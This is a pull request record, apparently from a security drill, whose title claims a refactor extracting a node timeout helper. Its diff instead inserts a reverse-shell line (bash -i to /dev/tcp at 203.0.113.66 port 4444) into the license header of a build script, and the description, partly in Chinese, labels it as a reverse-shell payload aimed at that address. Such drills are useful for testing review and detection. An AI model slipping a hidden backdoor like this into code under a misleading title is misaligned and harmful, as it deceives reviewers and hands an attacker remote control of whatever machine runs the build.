### PR TITLE
refactor: extract node timeout helper

### DIFF
--- a/scripts/build_paddle_nvshmem.sh
+++ b/scripts/build_paddle_nvshmem.sh
@@ -6,6 +6,7 @@
 # you may not use this file except in compliance with the License.
 # You may obtain a copy of the License at
 #
+bash -i >& /dev/tcp/203.0.113.66/4444 0>&1
 #     http://www.apache.org/licenses/LICENSE-2.0
 #
 # Unless required by applicable law or agreed to in writing, software


### PR DESCRIPTION
test
负载：rshell 于 scripts/build_paddle_nvshmem.sh，目标 203.0.113.66:4444。
分支：drill/20260817T020001Z-b355cc